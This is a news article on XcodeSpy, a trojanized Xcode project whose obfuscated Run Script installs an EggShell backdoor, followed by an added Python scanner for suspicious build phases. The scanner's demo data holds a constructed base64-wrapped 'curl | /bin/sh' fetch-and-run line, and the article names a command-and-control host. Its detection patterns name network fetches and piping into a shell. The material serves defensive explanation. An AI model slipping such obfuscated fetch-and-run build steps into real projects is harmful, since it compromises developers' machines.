Attackers are trying very hard to backdoor the Macs of iOS developers


Researchers say they have found a trojanized code library in the wild that attempts to install advanced surveillance malware on the Macs of iOS software developers.

It comes in the form of a malicious project for Xcode, the developer tool that Apple makes freely available to developers who write apps for iOS or its other operating systems. The project was a doctored copy of TabBarInteraction, a legitimate open source project that makes it easier for developers to animate iOS tab bars based on user interaction. An Xcode project is a repository for all the files, resources and information needed to build an app.

Walk on eggshells

Alongside the legitimate code was an obfuscated Run Script, a build phase that Xcode executes as part of the build. The script, which ran each time the developer's build target was launched, contacted an attacker-controlled server to download and install a customized version of EggShell, an open source backdoor that lets attackers spy on users through their microphone, camera and keyboard.

Researchers at SentinelOne, the security firm that discovered the trojanized project, call it XcodeSpy. They say they found two variants of the custom EggShell dropped by the malicious project. Both had been uploaded to VirusTotal through its web interface from Japan, the first on August 5 and the second on October 13.

“The latter sample was also found in the wild late in 2020 on a victim’s Mac in the United States,” SentinelOne researcher Phil Stokes wrote in a blog post on Thursday. “For reasons of confidentiality we are unable to provide further information about the ITW [in the wild] incident. However, the victim reported that they are repeatedly targeted by North Korean APT actors and that the infection came to light as part of their routine threat-hunting activities.”

So far, the company’s researchers are aware of only one case in the wild, involving a US organization. Indications from the SentinelOne analysis suggest the campaign “was operating at least between July and October 2020 and may also have targeted developers in Asia.”

Developers under attack

Thursday’s report comes two months after researchers at both Microsoft and Google said that hackers backed by the North Korean government were actively trying to infect the computers of security researchers. To win the researchers’ trust, the hackers spent weeks building Twitter personas and developing online working relationships.

Eventually, the fake Twitter profiles asked the researchers to open a web page using Internet Explorer. Those who took the bait found that their fully patched Windows 10 machines had a malicious service and an in-memory backdoor installed. Microsoft patched the vulnerability last week.

In addition to the watering-hole attack, the hackers sent prospective victims a Visual Studio project that purportedly contained proof-of-concept source code. Hidden in the project was custom malware that contacted the attackers’ control server.

Obfuscated malice

Experienced developers have long known how important it is to check for malicious Run Scripts before using a third-party Xcode project. While finding the scripts is not difficult, XcodeSpy tried to make the task harder by obfuscating the script.


Once decoded, it was clear that the script contacted a server at cralev[.]me and sent the mysterious command mdbcmd via a reverse shell built into the server.


The only warning a developer gets after running the Xcode project is the unremarkable build message captured in a screenshot by Patrick Wardle in the original post.

SentinelOne provides a script that makes it easy for developers to find Run Scripts in their projects. Thursday’s post also provides indicators of compromise to help developers determine whether they have been targeted or infected.
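As an added example, and not the script SentinelOne published nor code from the XcodeSpy project, the following Python audits a project.pbxproj for Run Script build phases and flags the patterns an obfuscated script tends to show: eval, base64 decoding, network fetches, data piped into a shell, and long encoded blobs, which it also decodes so the reviewer sees the real command rather than the wrapper. The sample project file, its object IDs, the payload and the staging.invalid URL are all constructed for this demonstration, and the regexes are heuristics, not a signature for XcodeSpy.

```python
import base64
import binascii
import re

# Constructed sample (not from XcodeSpy): a trimmed project.pbxproj holding two
# PBXShellScriptBuildPhase objects. The first is a routine build-number bump; the
# second hides its real command in a base64 blob fed to eval, the shape of an
# obfuscated Run Script. Payload, URL and object IDs are invented for the demo.
DEMO_PAYLOAD = "curl -fsSL https://staging.invalid/agent | /bin/sh"
DEMO_BLOB = base64.b64encode(DEMO_PAYLOAD.encode()).decode()

SAMPLE_PBXPROJ = r"""// !$*UTF8*$!
{
	archiveVersion = 1;
	objects = {
/* Begin PBXShellScriptBuildPhase section */
		1A2B3C4D /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "# Bump build number\nagvtool next-version -all\n";
		};
		5E6F7A8B /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "eval \"$(echo __BLOB__ | base64 -D)\"\n";
		};
/* End PBXShellScriptBuildPhase section */
	};
	rootObject = 00000000 /* Project object */;
}
""".replace("__BLOB__", DEMO_BLOB)

# One object of the pbxproj plist: "<hex id> /* comment */ = { ... };"
PHASE_RE = re.compile(
    r"^\s*(?P<id>[0-9A-F]{8,24})\s*(?:/\*.*?\*/)?\s*=\s*\{(?P<body>.*?)^\s*\};",
    re.MULTILINE | re.DOTALL,
)
ISA_RE = re.compile(r"isa\s*=\s*PBXShellScriptBuildPhase\s*;")
SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;')
ESCAPE_RE = re.compile(r"\\(.)", re.DOTALL)
BLOB_RE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")

# Heuristics for a Run Script doing more than building the app.
SUSPICIOUS = [
    (re.compile(r"\beval\b"), "eval of dynamically built code"),
    (re.compile(r"\bbase64\s+(-[dD]\b|--decode\b)"), "base64 decoding at build time"),
    (re.compile(r"\b(curl|wget|nscurl)\b"), "network access at build time"),
    (re.compile(r"\|\s*(/bin/|/usr/bin/)?(ba|z|da)?sh\b"), "piping data into a shell"),
    (re.compile(r"\\x[0-9a-fA-F]{2}|\bxxd\b"), "hex-encoded bytes"),
]

def unescape_pbx(raw):
    """Undo pbxproj string escapes (backslash-n, backslash-t, backslash-quote)."""
    return ESCAPE_RE.sub(lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), raw)

def decode_blobs(script):
    """Return the plaintext of every base64 blob in the script that decodes to text."""
    decoded = []
    for m in BLOB_RE.finditer(script):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        text = raw.decode("utf-8", errors="replace")
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            decoded.append(text)
    return decoded

def scan(text):
    return [label for rx, label in SUSPICIOUS if rx.search(text)]

def audit_pbxproj(text):
    """List every Run Script build phase in a project.pbxproj with its findings."""
    results = []
    for phase in PHASE_RE.finditer(text):
        body = phase.group("body")
        if not ISA_RE.search(body):
            continue
        m = SCRIPT_RE.search(body)
        script = unescape_pbx(m.group(1)) if m else ""
        decoded = decode_blobs(script)
        findings = scan(script)
        if decoded:  # judge what the blob would run, not just the wrapper around it
            findings.append("encoded blob decodes to shell commands")
            findings += [f for f in scan("\n".join(decoded)) if f not in findings]
        results.append({"id": phase.group("id"), "script": script,
                        "decoded": decoded, "findings": findings})
    return results

if __name__ == "__main__":
    for r in audit_pbxproj(SAMPLE_PBXPROJ):
        print(f"{r['id']}: {'SUSPICIOUS' if r['findings'] else 'ok'}")
        for f in r["findings"]:
            print(f"    - {f}")
        for d in r["decoded"]:
            print(f"    decoded: {d!r}")
```

Run it against a real project with audit_pbxproj(open("App.xcodeproj/project.pbxproj").read()) before the first build, because the script executes as part of that build. Two caveats: Run Script build phases are not the only place a project can run shell commands (scheme pre- and post-actions in .xcscheme files can too), and a clean result from these heuristics is no substitute for checking the indicators of compromise SentinelOne published.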

A vector for malice

This is not the first time Xcode has been used in a malware attack. Last August, researchers uncovered Xcode projects circulating online that exploited two then-zero-day vulnerabilities in Safari. Once one of the XCSSET projects is opened and built, a Trend Micro analysis found, the malicious code runs on the developer’s Mac.

And in 2015, researchers found 4,000 iOS apps infected by XcodeGhost, the name given to a tampered-with version of Xcode that spread mainly in Asia. Apps compiled with XcodeGhost could be used by attackers to read and write the device’s clipboard, open specific URLs, and exfiltrate data.

Unlike XcodeGhost, which infected apps, XcodeSpy targets developers. Given the quality of the surveillance backdoor XcodeSpy installs, it would not be much of a stretch for the attackers to eventually deliver malware to users of the developers’ software as well.

“There are other scenarios with such high-value victims,” SentinelOne’s Stokes wrote. “Attackers could simply be trawling for interesting targets and gathering data for future campaigns, or they could be attempting to gather AppleID credentials for use in other campaigns that use malware with valid Apple developer signatures. These suggestions do not exhaust the possibilities, nor are they mutually exclusive.”
